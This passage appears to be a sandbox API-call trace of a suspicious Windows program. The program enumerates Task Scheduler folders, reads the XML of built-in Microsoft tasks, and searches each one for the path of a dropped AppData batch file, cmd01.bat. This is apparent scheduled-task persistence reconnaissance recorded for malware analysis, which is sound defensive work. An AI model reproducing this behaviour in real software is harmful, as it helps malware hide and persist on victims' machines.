true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T06:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.354] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic24\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T06:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.354] IUnknown:Release (This=0x929620) returned 0x0 [0162.354] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.354] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDevicePeriodic6") returned 0x0 [0162.354] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic6\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T09:00:00\r\n \r\n PT6H\r\n \r\n PT1H30M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.355] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic6\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T09:00:00\r\n \r\n PT6H\r\n \r\n PT1H30M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.355] IUnknown:Release (This=0x929620) returned 0x0 [0162.355] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.355] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDeviceScreenOnOff") returned 0x0 [0162.355] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceScreenOnOff\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.356] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceScreenOnOff\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.356] IUnknown:Release (This=0x929620) returned 0x0 [0162.356] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.356] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterDeviceSettingChange") returned 0x0 [0162.356] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceSettingChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 75F8BCA33E06830D\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.357] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceSettingChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 75F8BCA33E06830D\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.357] IUnknown:Release (This=0x929620) returned 0x0 [0162.357] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.357] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="RegisterUserDevice") returned 0x0 [0162.357] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterUserDevice\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0162.358] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterUserDevice\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.358] IUnknown:Release (This=0x929620) returned 0x0 [0162.358] IUnknown:Release (This=0x929480) returned 0x0 [0162.358] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.358] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.358] IUnknown:Release (This=0x929480) returned 0x0 [0162.358] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.359] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.359] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.359] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.359] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.359] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="Scheduled") returned 0x0 [0162.359] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {C1F85EF8-BCC2-4606-BB39-70C523715EB3}\r\n \r\n \r\n") returned 0x0 [0162.360] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {C1F85EF8-BCC2-4606-BB39-70C523715EB3}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.360] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.360] IUnknown:Release (This=0x929470) returned 0x0 [0162.360] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.361] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.361] IUnknown:Release (This=0x929470) returned 0x0 [0162.361] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.361] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.361] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.361] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.361] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.361] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="SilentCleanup") returned 0x0 [0162.361] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1301)\r\n \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\cleanmgr.exe\r\n /autoclean /d %systemdrive%\r\n \r\n \r\n") returned 0x0 [0162.363] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1301)\r\n \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\cleanmgr.exe\r\n /autoclean /d %systemdrive%\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.363] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.363] IUnknown:Release (This=0x929470) returned 0x0 [0162.363] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.364] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.364] IUnknown:Release (This=0x929470) returned 0x0 [0162.364] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.364] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.364] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.364] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.364] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.364] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0162.365] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0162.365] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.365] IUnknown:Release (This=0x929600) returned 0x0 [0162.365] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.366] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0162.366] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0162.367] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.367] IUnknown:Release (This=0x929600) returned 0x0 [0162.367] IUnknown:Release (This=0x929470) returned 0x0 [0162.367] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.367] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.367] IUnknown:Release (This=0x929470) returned 0x0 [0162.367] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.368] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.368] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.368] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.368] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.368] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Diagnostics") returned 0x0 [0162.368] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\Diagnostics\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\disksnapshot.exe\r\n -z\r\n \r\n \r\n") returned 0x0 [0162.369] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\Diagnostics\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\disksnapshot.exe\r\n -z\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.369] IUnknown:Release (This=0x929600) returned 0x0 [0162.369] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.369] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="StorageSense") returned 0x0 [0162.369] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\StorageSense\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\StorageUsage.dll,GetStorageUsageInfo\r\n \r\n \r\n") returned 0x0 [0162.370] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\DiskFootprint\\StorageSense\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n %windir%\\system32\\StorageUsage.dll,GetStorageUsageInfo\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.370] IUnknown:Release (This=0x929600) returned 0x0 [0162.370] IUnknown:Release (This=0x929470) returned 0x0 [0162.371] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.371] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.371] IUnknown:Release (This=0x929470) returned 0x0 [0162.371] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.371] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.371] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.371] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.371] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.371] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="dusmtask") returned 0x0 [0162.371] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)(A;;FRFX;;;AU)(A;;FRFX;;;BU)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\DUSM\\dusmtask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3291B950C\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dusmtask.exe\r\n \r\n \r\n") returned 0x0 [0162.372] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)(A;;FRFX;;;AU)(A;;FRFX;;;BU)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\DUSM\\dusmtask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3291B950C\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dusmtask.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.372] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.372] IUnknown:Release (This=0x929460) returned 0x0 [0162.372] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.373] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.373] IUnknown:Release (This=0x929460) returned 0x0 [0162.373] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.373] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.373] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.373] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.373] IUnknown:Release 